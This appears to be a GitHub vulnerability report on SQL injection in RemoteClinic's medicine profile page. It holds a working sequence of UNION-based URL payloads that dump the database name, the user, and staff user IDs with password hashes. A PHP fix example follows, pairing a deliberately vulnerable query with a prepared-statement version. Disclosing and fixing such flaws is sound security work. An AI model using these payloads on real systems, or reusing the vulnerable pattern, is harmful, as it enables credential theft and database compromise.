SQL Injection in /medicines/profile.php via id parameter #20

Open
Saud-Ahmad opened this issue Dec 26, 2022 · 1 comment

@Saud-Ahmad

Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

Vulnerable Endpoint: http://localhost/RemoteClinic/medicines/profile.php?id=30 (My Medicine Profile ID is 30)

Steps to Reproduce:

  1. Log in to the application as Doctor.
  2. Click on Directory.
  3. Click on any medicine profile.
  4. Now put a single quote in the medicine profile endpoint.
  5. Balance the query to remove errors.
     Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27--%20-
  6. Find the total number of columns.
     Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27%20order%20by%207--%20-
  7. Find the vulnerable columns.
     Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%201,2,3,4,5,6,7--%20-
  8. Now extract the current database and current user.
     Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7--%20-
  9. Extract all users and passwords (md5 hash).
     Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20group_concat(userid,0x3a,passkey,0x0a),2,3,4,5,6,7%20from%20p_staff_dir--%20-

Impact:

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.
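As an added example of the fix, not code from RemoteClinic: the report does not show profile.php, so the "before" below is a hypothetical reconstruction of the concatenation pattern its steps imply, placed beside a hardened version of the same lookup. The `medicines` table name, the `mysqli` connection and the function names are assumptions; only `p_staff_dir`, `userid` and `passkey` come from the report.

```php
<?php
// Added example, not the project's own code. Table name "medicines" and the
// function names are assumed; the vulnerable form reconstructs what the
// report's steps imply (id=30'-- - breaks the quoted literal).

// Make driver errors throw instead of returning false; log the exception
// server-side rather than rendering it, since the "balance the query to
// remove errors" step only works when SQL errors reach the browser.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// BEFORE (vulnerable): the raw id lands inside the SQL string, so a quote
// closes the literal and a trailing UNION can read any table, e.g. p_staff_dir.
function medicine_profile_unsafe(mysqli $db, array $get): ?array
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT * FROM medicines WHERE id = '$id'";   // do not do this
    $res = $db->query($sql);
    return $res->fetch_assoc() ?: null;
}

// AFTER (hardened): validate the parameter as a positive integer, then bind
// it as a typed parameter so the value can never alter the query structure.
function medicine_profile_safe(mysqli $db, array $get): ?array
{
    $id = filter_var(
        $get['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        http_response_code(400);           // rejects "30'-- -", "-30' union ...", etc.
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM medicines WHERE id = ?');
    $stmt->bind_param('i', $id);           // 'i' = integer; never string-interpolated
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

Apply the same integer validation and binding to every other `id`-style parameter in the application, since the report only covers the one endpoint it was tested on.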
